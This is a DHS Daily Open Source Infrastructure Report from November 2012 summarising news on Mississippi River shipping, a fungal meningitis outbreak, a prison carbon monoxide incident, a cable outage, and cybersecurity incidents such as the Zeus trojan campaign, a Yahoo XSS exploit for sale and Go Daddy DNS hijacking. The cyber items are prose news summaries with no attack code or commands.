Monday, November 26, 2012
Daily Report
Top Stories
• A crucial 200-mile stretch of the Mississippi River may be on
the verge of shutdown to barge traffic, a move that could paralyze commerce on
a vital inland waterway and ultimately drive up consumer prices. – USA Today
6. November
23, USA Today – (National) Mississippi River commerce imperiled by low water.
A crucial 200-mile stretch of the Mississippi River may be on the verge of shutdown
to barge traffic, a move that could paralyze commerce on a vital inland waterway
and ultimately drive up consumer prices. The temporary closure of the Mississippi
River from St. Louis to Cairo, Illinois, could result from an Army Corps of Engineers
plan to reduce water flow from a reservoir into the Missouri River starting November
23, shipping companies and industry groups warned. The Corps annually decreases
water releases to ensure adequate reservoir levels and to prevent ice buildup and
flooding. In 2012, already-low river levels caused by drought could shrink to
the point that barges carrying grain, coal, and other products would not be
able to navigate the Mississippi, said a spokesperson with the Waterways
Council, which represents ports and shippers. “This is an impending economic
crisis that could delay shipment of $7 billion in commodities in December and
January,” she said. A Corps spokeswoman said water releases from the reservoir
at Gavins Point Dam on the Nebraska-South Dakota border will drop gradually
starting November 23 from 36,000 cubic feet per second to 12,000 by December
11. Due to the drought, most vessels on the Mississippi River are now limited
to a 9-foot draft, said a spokesperson with Knight Hawk Coal. “If we go to
6-foot drafts, the river is effectively closed,” he said. Source: http://www.firstcoastnews.com/news/usworld/article/283549/6/Mississippi-River-commerce-imperiled-by-low-water
• Testing by the U.S. Food and Drug Administration on steroid
medications produced by the New England Compounding Center found more
contaminants in additional drugs. – Nashville Tennessean
21. November
21, Nashville Tennessean – (National) Meningitis outbreak: FDA
finds more contaminants in NECC meds. Testing by the U.S. Food and Drug Administration
(FDA) on steroid medications produced by New England Compounding Center has
found more contaminants in additional drugs, the Nashville Tennessean reported
November 21. The FDA has updated its list of lot numbers for contaminated drugs
after finding unknown fungal growths in triamcinolone and bethamethasone. It also
found three forms of bacteria in betamethasone and one form of bacteria in trimacinolone.
New England Compounding Center’s products have been linked to a national
outbreak of fungal meningitis and other infections that have sickened 490 people,
with 34 deaths. Tennessee has had the most deaths with 13 and the second-most illnesses
with 82. This is the first time that the FDA has confirmed contaminants in triamcinolone.
However, the agency previously said in an inspection report that foreign substances
were found on heating and cooling vent louvers behind a piece of equipment used
to make bulk drug suspensions of preservative-free methylprednisolone and triamcinolone.
• Nearly 50 female inmates at a York County, Pennsylvania prison
were treated for carbon monoxide poisoning. Officials said a preliminary investigation
indicated the deadly odorless and colorless gas may have come from the heating,
ventilation, and air conditioning system. – Associated Press
23. November
22, Associated Press – (Pennsylvania) 49 female inmates sickened by gas at Pa.
prison. Nearly 50 female inmates at a York County, Pennsylvania prison were
treated for carbon monoxide poisoning. A statement from York County said five inmates
remained hospitalized as of November 22. The remaining 44 were returned to the
York County Prison. The women fell ill November 21 in a prison dormitory. Officials
said a preliminary investigation indicated the deadly odorless and colorless gas
may have come from the heating, ventilation, and air conditioning system. That system
was shut down. The county’s statement said carbon monoxide levels have returned
to normal. Prisoners living in the affected unit were relocated to other areas
in the facility. Source: http://www.google.com/hostednews/ap/article/ALeqM5iWnMC3qY_jBrba0wSdXlCqqaEmbA?docId=aff8ec4e6a09455fa42c48a4806acbf3
• Internet service was restored November 21 for Charter
Communication customers after vandals cut a fiber-optic cable, crashing service
across northern California for about 18 hours. The outage affected local
Internet service providers and the City of Redding’s systems as well. – Redding
Record Searchlight See item 33 below in
the Information Technology Sector
Details
Banking and Finance Sector
3. November
23, Silicon Republic – (International) Fake Apple invoices in your inbox could lead
to empty bank accounts. Fake Apple invoices are appearing in inboxes that
contain a Blackhole exploit kit and a trojan that is designed to log users’
keystrokes and ultimately compromise bank accounts, Silicon Republic reported
November 23. The multi-pronged approach was discovered by a Sophos researcher
who reported it in the Naked Security blog. The online criminals who circulated
the fake invoices are using a form of social engineering where users think they
are being billed for an expensive product they never bought, in the
researcher’s case, he received an invoice telling him he ordered and paid for
goods valued at $699. If a user clicks on any of the links contained in the
email they are taken to a page proclaiming to be the IRS telling them their
browser is unsupported and offers a range of browser options. As the page is displayed,
the user’s computer gets infected with the Zeus/Zbot trojan. If the user clicks
on any of the browser options, a file labeled update.exe is downloaded. If the
user opens the file their computer is automatically infected with the trojan,
which is designed to record keystrokes and ultimately give criminals the
information they need to access the user’s bank account online.
4. November
23, The H – (International) DDoS attackers cost PayPal 3.5 million pounds.
PayPal paid around $5.6 million to defend and arm itself against
distributed denial-of-service (DDoS) attacks, The H reported November 23. The
attacks in 2010 and 2011 were named Operation Payback by members of hacktivist
collective Anonymous. The details were revealed in a court case in the United
Kingdom where a defendant is facing charges of conspiring to impair the
operation of computers. The BBC reported the prosecution as saying that more than
one hundred workers from eBay, PayPal’s parent company, spent 3 weeks working
on DDoS-attack-related issues and that PayPal had bought software and hardware
to defend itself against further attacks. Source: http://www.h-online.com/security/news/item/DDoS-attackers-cost-PayPal-Lb3-5-million-1755947.html
Information Technology Sector
26. November
23, Krebs on Security – (International) Yahoo email-stealing
exploit
fetches
$700. A zero-day vulnerability in yahoo.com that lets attackers hijack
Yahoo!
email accounts and
redirect users to malicious Web sites offers a fascinating glimpse
into the underground
market for large-scale exploits. The exploit, being sold for $700
by an Egyptian hacker on
an exclusive cybercrime forum, targets a “cross-site
scripting” (XSS) weakness
in yahoo.com that lets attackers steal cookies from Yahoo!
Webmail users. Such a flaw
would let attackers send or read email from the victim’s
account. “I’m selling
Yahoo stored xss that steal Yahoo emails cookies and works on
ALL browsers,” wrote the
vendor of this exploit, using the hacker handle ‘TheHell.’
“And you don’t need to
bypass IE or Chrome xss filter as it do that itself because it’s
stored xss.” Krebs On
Security alerted Yahoo! to the vulnerability, and the company
says it is responding to
the issue. The director of security at Yahoo! said the challenge
now is working out the
exact yahoo.com URL that triggers the exploit.
27. November
23, Softpedia – (International) Cybercriminals use fake digital certificates to
sign police trojans. Cybercriminals have begun using fake certificates to
sign ransomware to ensure that the malware have a better chance of evading
digital signature checks. Trend Micro experts have come across a couple of
samples, identified as TROJ_RANSOM.DDR, both signed with a suspicious name and
issued by a suspicious provider. One of the samples relies on the FBI to scare
internauts into paying a fine if they want to see their computers unlocked,
while the other one uses the reputation of the UK’s Police Central e-Crime
Unit. The newer variants lock up computers and threaten victims with messages
based on their geographic location. The language used to demand the payment of
fines is adapted and so is the name of the law enforcement agency. Source: http://news.softpedia.com/news/Cybercriminals-Use-Fake-Digital-Certificatesto-Sign-Police-Trojans-309128.shtml
28. November
23, Softpedia – (International) Sucuri warns of fake jQuery sites distributing
malware. Cybercriminals have set up a number of fake jQuery Web sites and
are using them to distribute pieces of malware. Experts from Sucuri Malware
Labs have identified at least three such sites. The jquerys.org,
jquery-framework.com, and jqueryc.com domains are the ones in question.
According to researchers, references to jqueryc.com have been found in the
header of the index.php file of numerous sites. Users are advised to steer
clear of such sites. The legitimate jQuery sites are jquery.com and jquery.org.
Other variants, even if they look legitimate, are likely fake. Source: http://news.softpedia.com/news/Sucuri-Warns-of-Fake-jQuery-Sites-Distributing-Malware-309189.shtml
29. November
23, Softpedia – (International) Cybercriminals hack DNS records of Go Daddy
sites to distribute ransomware. Cybercriminals have found a clever way to distribute
pieces of ransomware by hacking the Domain Name System (DNS) records of Web
sites hosted by Go Daddy in an effort to redirect visitors to their own
malicious sites. According to researchers from security firm Sophos, crooks are
abusing this system by adding their own IP addresses to the DNS records of Web
sites. By adding several subdomains with corresponding DNS entries that
reference malicious IPs, attackers can evade security filtering and trick users
into thinking that they are on a legitimate site. In this particular case, the
rogue servers to which users are redirected to host an exploit kit called Cool
EK, which looks for vulnerabilities in the target system to distribute
ransomware. Experts have not been able to determine if the attackers are utilizing
stolen account credentials, because Go Daddy does not allow webmasters to view
their historical login activity. Source: http://news.softpedia.com/news/Cybercriminals-Hack-DNS-Records-of-Go-Daddy-Sites-to-Distribute-Ransomware-309327.shtml
30. November
23, Softpedia – (International) ENISA releases report on the use of honeypots
to detect cyberattacks. Digital traps or honeypots are often used by security
researchers to detect and analyze cyber threats. However, according to the European
Network and Information Security Agency (ENISA), their usage among Computer
Emergency Response Teams (CERTs) is not as widespread as it should be. In a
previous report, entitled “Proactive Detection of Network Security Incidents,” ENISA
detailed the benefits of using honeypots to detect and investigate attacks. Despite
their efficiency, certain CERTs have not deployed them. That is why the new study
focuses on a number of 30 honeypots to offer insight on which technologies and solutions
should be utilized. The report also looks at critical issues organizations are confronted
with and practical deployment strategies. Over the past years, honeypots have
been successfully utilized on a number of occasions. These digital traps are designed
to mimic a real service, an application, or a system in an attempt to lure potential
cyberattackers. When an entity connects to a honeypot, it is automatically considered
to be suspicious and its every move is closely monitored in an attempt to detect
malicious activity. Source: http://news.softpedia.com/news/ENISA-Releases-Report-on-the-Use-of-Honeypots-to-Detect-Cyberattacks-309270.shtml
31. November
22, Softpedia – (International) Experts find way to crack default WPA2 passwords
of Belkin routers. Security researchers claim that the default WPA2 passwords
used by many Belkin routers can be easily guessed by an attacker who knows the
device’s WAN MAC address. A number of Belkin wireless routers are shipped with
a default WPA2 password to protect network connections. The apparently random
passwords are printed on a label on the bottom of the router. Although this approach
should in theory be more secure, because the password is likely stronger than what
many users would set themselves, it turns out that the random passphrases are
not so random. The researchers determined that the password is based on the
device’s WAN MAC address, and since this information is not so difficult to
obtain, a remote attacker could easily hack into a targeted network if the
default configuration is used. The default password is made of 8 characters
which can be determined by replacing each hex-digit of the WAN MAC address with
another value from a static substitution table. Several device models are
affected, including Belkin N450 Model F9K1105V2 and Belkin Surf N150 Model
F7D1301v1. Source: http://news.softpedia.com/news/Experts-Find-Way-to-Crack-Default-WPA2-Passwords-of-Belkin-Routers-309081.shtml
32. November
21, Softpedia – (International) Exploitation of privileged access points: Common
vector for high-profile attacks. A study performed by information security firm
Cyber-Ark labs reveals that, in most of the recent high-profile cyberattacks,
the common attack vector is the exploitation of privileged access points. These
privileged access points usually consist of administrative or privileged
accounts, application backdoors, and hardcoded or default passwords. In recent
months, privileged access points have been utilized in the Flame attacks, and
the ones against companies such as Saudi Aramco and Subway. The executive vice
president Americas of Cyber-Ark Software explains that cybercriminals are well
aware of the power and wide ranging access provided by these access points,
which is the main reason why future attacks
will also target them. Source:
http://news.softpedia.com/news/Exploitation-of-Privileged-Access-Points-Common-Attack-Vector-for-High-Profile-Attacks-308594.shtml
For another story, see item 4 above in the Banking and Finance Sector
Communications Sector
33. November
21, Redding Record Searchlight – (California) Vandals cut
Charter Communications’ cable; crash Internet for 18 hours. Internet
service was restored November 21 for Charter Communication customers after
vandals cut a fiber-optic cable, crashing service across northern California
for about 18 hours. The cable was cut near Emeryville near Oakland. The outage
halted email service and online bill payment services for all City of Redding
departments. Charter officials said they did not know how many customers were
affected. A spokeswoman for Charter said Comcast customers and local Internet
service providers were also impacted by the disruption of service. The cable
was cut by vandals November 20, which sent workers scurrying to repair the
damage, a CenturyLink spokeswoman said November 21. Crews spliced the fiber
line to make the repairs. Work was slowed because of flooding in the area,
which sent water into manholes where the cable was located. Source: http://www.redding.com/news/2012/nov/21/vandals-cut-chartercommunications-cable-crash/
Department of Homeland Security
(DHS)
DHS Daily Open Source Infrastructure Report Contact Information
About the reports - The DHS Daily Open Source Infrastructure Report is a daily [Monday through Friday]
summary of open-source published
information
concerning significant critical infrastructure issues. The DHS Daily Open Source Infrastructure Report is archived for ten days on
the
Department of Homeland Security Web site: http://www.dhs.gov/IPDailyReport
Contact Information
Content and Suggestions: Send mail to cikr.productfeedback@hq.dhs.gov or contact the DHS
Daily Report Team at (703)387-2314
Subscribe to
the
Distribution List: Visit the
DHS Daily Open Source Infrastructure Report and follow
instructions to
Get e-mail updates when this information
changes.
Contact DHS
To report physical infrastructure incidents or to request information, please contact the National Infrastructure
To report cyber infrastructure incidents or to
request information,
please contact US-CERT at soc@us-cert.gov or visit their Web
page at www.us-cert.go v.
Department of Homeland Security Disclaimer
The DHS Daily Open Source Infrastructure Report is a non-commercial publication intended to
educate and
inform personnel engaged
in infrastructure protection. Further reproduction
or redistribution is subject to original copyright
restrictions. DHS provides no
warranty of ownership of the copyright,
or accuracy with respect to
the
original
source material.